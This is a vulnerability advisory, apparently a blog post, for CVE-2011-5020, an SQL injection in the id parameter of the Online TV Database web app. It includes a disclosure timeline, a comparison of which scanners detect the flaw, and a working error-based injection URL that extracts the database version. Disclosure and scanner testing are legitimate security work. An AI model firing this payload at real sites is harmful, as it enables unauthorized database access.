CVE-2011-5020, Online TV Database, SQL Injection, CWE-89, CAPEC-66
Source URL http://sourceforge.net/projects/tvdb/
Bug: SQLi in Id Parameter
Application Description:
"A web/XML interface and database schema for managing TV series
information and user-submitted graphics. Will be interfaced by a
number of HTPC plugins and software. Currently used by plugins for
Meedio, Media Portal, and XBox Media Center".
"The API is currently being used by the myTV add-in for Windows Media Center, XBMC (formerly XBox Media Center); the meeTVshows and TVNight plugins for Meedio; the MP-TVSeries plugin for MediaPortal, Numote (iPhone/Android app and set-top device), and many more".
SQL Injection in the Id Parameter, PoC:
/?tab=series&id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@version)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))
Timeline
12-24-2011 - Notified Developer
12-27-2011 - Obtained CVE ID
12-29-2011 - Renotified Developer
.... No contact
2-6-2012 - Published
Vulnerability,URL,Parameter,ParameterType
"SQL Injection","/","tab","GET","id","GET",
Coverage Scorecard
Burp 1.4.x - No
Acunetix 7 + 8 - No
Netsparker 2 - Yes
NeXpose - No
Paros Pro - No
ZAProxy - No
W3AF - No
SQLMap - No
Regex Match for major CoTs ongoing....
No comments:
Post a Comment